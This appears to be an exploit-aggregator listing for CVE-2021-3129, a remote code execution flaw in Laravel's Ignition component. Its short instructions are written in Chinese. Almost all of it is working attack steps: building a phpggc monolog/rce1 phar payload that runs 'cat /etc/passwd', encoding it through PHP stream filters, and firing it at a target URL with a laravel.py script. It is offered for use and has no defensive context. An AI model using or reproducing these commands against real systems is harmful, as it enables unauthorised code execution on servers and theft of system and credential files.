Exploit for Vulnerability in Facade Ignition CVE-2021-3129

Name: Exploit for Vulnerability in Facade Ignition CVE-2021-3129
Rating: 5 (247 reviews)

2022-10-11 | CVSS 7.5

## https://sploitus.com/exploit?id=02C11241-781D-5142-A562-1315AFB6C819
# CVE-2021-3129

```
生成自定义命令的phar包：
php -d'phar.readonly=0' ./phpggc monolog/rce1 system "cat /etc/passwd" --phar phar -o php://output | base64 -w0

php -a 进入php命令行环境
$fp = fopen('php://output', 'w');
stream_filter_append($fp, 'convert.quoted-printable-encode');
$size = "";
fwrite($fp, iconv('utf-8','utf-16le',$size));

将生成好的payload保存为一个文件，然后利用脚本指定：
python laravel.py --url "http(s)://192.168.0.109:8000/" --phar test.phar
```